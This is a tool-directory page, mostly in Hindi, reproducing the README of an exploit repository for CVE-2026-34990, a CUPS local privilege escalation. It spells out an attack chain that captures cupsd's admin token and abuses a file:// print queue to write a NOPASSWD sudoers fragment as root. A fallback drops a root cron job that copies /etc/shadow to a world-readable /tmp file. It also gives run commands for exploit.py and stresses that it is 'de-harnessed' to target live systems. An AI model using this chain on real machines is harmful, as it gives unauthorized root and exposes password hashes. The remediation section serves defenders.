Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-34990 — रूट `cupsd` के विरुद्ध स्थानीय विशेषाधिकार वृद्धि। | Kitploit
उपकरण/GitHubGitHub/gbuyssens/cve-2026-34990
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubgbuyssens/cve-2026-34990

CVE-2026-34990

रूट `cupsd` के विरुद्ध स्थानीय विशेषाधिकार वृद्धि।

रिपॉजिटरी देखें
3 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-34990 — CUPS स्थानीय विशेषाधिकार वृद्धि (cups2root, डी-हार्नेस्ड)

CVSS 3.x : 8.4 HIGH   (लगभग — सत्यापित करें)
CWE      : CWE-287 (अनुचित प्रमाणीकरण) + CWE-269 (अनुचित विशेषाधिकार प्रबंधन)
Fix      : CUPS 2.4.17+
Affects  : CUPS ≤ 2.4.16 जिसमें cupsd root के रूप में चल रहा हो और 631 स्थानीय रूप से पहुँच योग्य हो

root cupsd के विरुद्ध स्थानीय विशेषाधिकार वृद्धि। जब इसे एक दुर्भावनापूर्ण स्थानीय सर्वर की ओर एक IPP client के रूप में कार्य करने के लिए बाध्य किया जाता है, तो cupsd एक 401 WWW-Authenticate: Local चुनौती का उत्तर अपने ही admin token को पुनः प्रस्तुत करके देता है। उस token को कैप्चर करने से एक अविशेषाधिकार प्राप्त उपयोगकर्ता cupsd को admin (root) के रूप में संचालित कर सकता है। एक स्थायी file:// प्रिंट कतार (printer-is-temporary=false) FileDevice नीति को बायपास करती है, इसलिए एक raw Print-Job हमलावर के बाइट्स को root के रूप में किसी भी पथ पर लिखता है — यहाँ एक NOPASSWD sudoers फ़्रैगमेंट।


विषय-सूची

  • भेद्यता सारांश
  • मूल कारण
  • हमला श्रृंखला
  • डी-हार्नेसिंग बनाम सार्वजनिक PoC
  • प्रभावित संस्करण
  • यह रिपॉज़िटरी
  • उपयोग
  • उपचार
  • संदर्भ

भेद्यता सारांश

दो प्रिमिटिव मिलकर मनमानी root फ़ाइल-राइट में बदल जाते हैं:

  1. पुनः प्रयोग योग्य Local प्रमाणीकरण। cupsd /run/cups/certs/ के अंतर्गत एक root प्रमाणपत्र द्वारा समर्थित Local प्रमाणीकरण स्वीकार करता है। एक IPP client के रूप में कार्य करते हुए, यह 401 WWW-Authenticate: Local के साथ चुनौती दिए जाने पर उस admin token को स्वेच्छा से प्रस्तुत करता है। cupsd को आपके नियंत्रण वाले एक नकली IPP सर्वर की ओर इंगित करें और आप एक ऐसा token कैप्चर कर लेते हैं जो इसे root के रूप में संचालित करने के लिए वैध है।
  2. FileDevice बायपास। device-uri के रूप में file:// डिफ़ॉल्ट रूप से अस्वीकार किया जाता है। कतार को printer-is-temporary=false के साथ बनाने से यह स्थायी हो जाती है और उस गार्ड को दरकिनार कर देती है; एक raw Print-Job तब अपने बाइट्स को सीधे लक्ष्य फ़ाइल में, root के रूप में लिखता है।

मूल कारण

                  cupsd (root)                     rogue server 127.0.0.1:9189
                       |                                    |
  CUPS-Create-Local-Printer                                 |
  device-uri=ipp://127.0.0.1:9189/ipp/print                 |
                       |  "validate" the printer            |
                       |----------------------------------->|
                       |   401 WWW-Authenticate: Local      |
                       |<-----------------------------------|
                       |   retry + Authorization: Local <T> |
                       |----------------------------------->|  capture <T>

<T> cupsd का स्वयं का admin token है — इसे /admin/ के विरुद्ध पुनः प्रस्तुत करें और आप root-समतुल्य हैं।


हमला श्रृंखला

1. Cap thread          bind 127.0.0.1:9189, answer 401 Local, capture token
2. Coerce              CUPS-Create-Local-Printer -> device-uri ipp://127.0.0.1:9189/...
                       -> cupsd connects out -> 401 -> retry -> [+] Local token
3. Root write          CUPS-Add-Modify-Printer  device-uri=file:///etc/sudoers.d/<user>-pwn
                       printer-is-temporary=false (FileDevice bypass) + accept + resume
                       Print-Job (application/vnd.cups-raw, gzip) = "<user> ALL=(ALL) NOPASSWD: ALL"
4. Verify              sudo -n id   ->   root
   (fallback: a root cron job dropped to /etc/cron.d/<user>-pwn copies /etc/shadow
    to /tmp/shadow-<user> mode 644; wait ≤90s for cron)

डी-हार्नेसिंग बनाम सार्वजनिक PoC

संदर्भ PoC (GHSA-c54j-2vqw-wpwp / cups2root, R. de Jager) एक डेमो हार्नेस है: यह root के रूप में चलता है, अपना स्वयं का cupsd और एक अस्थायी unpriv उपयोगकर्ता उत्पन्न करता है, फिर हमलावर का अनुकरण करने के लिए sudo -u unpriv करता है। जैसा है वैसा अनुपयोगी। परिवर्तन:

  1. डी-हार्नेस्ड — कोई root/spawn स्कैफ़ोल्डिंग नहीं; 127.0.0.1:631 पर पहले से root चल रहे सिस्टम cupsd को लक्षित करता है।
  2. वास्तविक लक्ष्य — हमलावर = वर्तमान उपयोगकर्ता (या $ATTACKER); फ़्रैगमेंट <user> ALL=(ALL) NOPASSWD: ALL।
  3. सॉकेट्स पर raw IPP — ipptool / lpadmin / lpinfo / cupsctl के बिना पूर्ण पुनर्लेखन

प्रभावित संस्करण

StatusVersions
VulnerableCUPS ≤ 2.4.16
FixedCUPS 2.4.17 and later

यह रिपॉज़िटरी

FileRole
exploit.pyPoC: token leak → file:// queue → raw Print-Job → sudoers root
README.mdThis file

उपयोग

केवल Python 3 मानक लाइब्रेरी — कोई निर्भरता नहीं।

# attacker = current user, cupsd on 127.0.0.1:631
python3 exploit.py

# override the target user (e.g. after landing as anotheruser)
ATTACKER=anotheruser python3 exploit.py

# non-default cupsd / capture endpoint
IPP_HOST=127.0.0.1 IPP_PORT=631 CAPTURE_PORT=9189 python3 exploit.py

सफलता पर:

[+] Local token: <token>
[+] ROOT via sudoers

फिर sudo -i।


उपचार

  1. CUPS 2.4.17+ में अपग्रेड करें।
  2. जहाँ संभव हो cupsd को root के रूप में न चलाएँ; विशेषाधिकार छोड़ें / सेवा को सैंडबॉक्स करें।
  3. Local प्रमाणीकरण और file:// डिवाइस बैकएंड को प्रतिबंधित करें; स्थायी कतारों के लिए FileDevice नीति लागू रखें।
  4. यदि प्रिंटिंग की आवश्यकता नहीं है: systemctl disable --now cups cups-browsed और पैकेज हटा दें।

संदर्भ

  • NVD — CVE-2026-34990
  • GHSA-c54j-2vqw-wpwp — cups2root (R. de Jager, v12-security)
  • OpenPrinting CUPS 2.4.17 रिलीज़ नोट्स

अस्वीकरण

यह परियोजना केवल अधिकृत सुरक्षा परीक्षण, शिक्षा और रक्षात्मक अनुसंधान के लिए है। लागू कानूनों और अपनी प्रयोगशाला या ग्राहक के एंगेजमेंट नियमों का पालन करने की जिम्मेदारी आपकी है।

टूल डाउनलोड करें